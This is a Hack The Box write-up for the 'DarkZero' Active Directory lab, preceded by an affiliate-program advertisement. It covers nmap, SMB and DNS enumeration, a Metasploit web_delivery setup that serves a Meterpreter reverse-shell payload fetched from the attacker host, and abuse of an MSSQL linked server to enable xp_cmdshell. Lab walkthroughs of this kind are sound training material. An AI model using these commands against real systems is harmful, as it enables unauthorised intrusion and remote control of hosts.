DarkZero - HTB Write-up
Difficulty: Hard
🎯 Affiliate Program
Interested in earning rewards while sharing awesome content? Join the 1337sheets Affiliate Program!
Here's how it works:
- Refer subscribers who become premium members
- Earn a 50% discount on select products OR a $20 account credit at kaizentechlabs.us
- Get access to electronic hacking gear, Pwnagotchis, Bjorn the Network Raiders, and more!
Ready to join?
Contact: [email protected]
Subject line: 1337sheets affiliate program
📋 Box Overview
DarkZero is a layered Active Directory challenge that simulates a realistic enterprise environment. This box requires chaining multiple advanced techniques including SQL linked servers, Kerberos delegation, ticket manipulation, and cross-subnet pivoting. You'll encounter multihomed hosts, split-horizon DNS, and various privilege escalation paths that demand both technical skill and persistence.
Key Learning Areas:
- Active Directory enumeration and exploitation
- SQL Server linked server abuse
- Kerberos ticket collection and Pass-the-Ticket attacks
- Network pivoting with Ligolo
- CVE exploitation for privilege escalation
Initial Credentials:
john.w / RFulUtONCOL!
🔍 Enumeration
Port Scanning
Starting with a comprehensive nmap scan to identify open services:
nmap -p 1-65535 -T4 -A -v <target_ip>
Key Services Identified:
- DNS (53) - Simple DNS Plus
- Kerberos (88) - Windows Kerberos authentication
- LDAP (389/636/3268/3269) - Active Directory services
- SMB (139/445) - File sharing
- MSSQL (1433) - Microsoft SQL Server 16.00.1000.00
- WinRM (5985) - Remote management
- RPC (135, various high ports) - Remote procedure calls
Domain Information
Domain: darkzero.htb
Primary DC: DC01.darkzero.htb
Secondary DC: dc02.darkzero.ext
Hosts File Generation
Using NetExec to automatically populate the hosts file:
nxc smb <target_ip> -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts
SMB Enumeration
smbmap -H <target_ip> -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'
Only default shares were present - no immediate vectors here. BloodHound enumeration also yielded minimal useful results.
DNS Enumeration - Critical Discovery
Querying for DNS records reveals something interesting:
dig @DC01.darkzero.htb ANY darkzero.htb
Important Finding:
The domain resolves to two different IP addresses:
- Public-facing network (10.x.x.x/8)
- Internal network (172.16.20.1/16)
This indicates a multihomed host with split-horizon DNS configuration. The 172.16.20.x subnet is likely only accessible from within the internal network - we'll need to pivot to reach it.
💉 Initial Access via MSSQL
Setting Up Web Delivery
First, prepare a Meterpreter payload delivery mechanism:
msfconsole -q -x "use exploit/multi/script/web_delivery; \
set payload windows/x64/meterpreter/reverse_tcp; \
set LHOST tun0; \
set LPORT 443; \
set target 2; \
exploit -j"
This creates a PowerShell one-liner that downloads and executes our payload.
MSSQL Connection
Connect to the SQL server using our credentials:
mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@<target_ip>' -windows-auth
Attempting Command Execution
Try enabling xp_cmdshell on DC01:
enable_xp_cmdshell
Result: ❌ Failed - insufficient privileges
Discovering Linked Servers
Enumerate linked SQL servers:
enum_links
Key Discovery:
- DC01 and DC02.darkzero.ext are configured as linked servers
- The link to DC02 uses
darkzero\john.wlocally but connects asdc01_sql_svcremotely dc01_sql_svchas higher privileges on DC02
Exploiting Linked Server
Switch to the linked server:
use_link "DC02.darkzero.ext"
Now try enabling xp_cmdshell again:
enable_xp_cmdshell
Result: ✅ Success!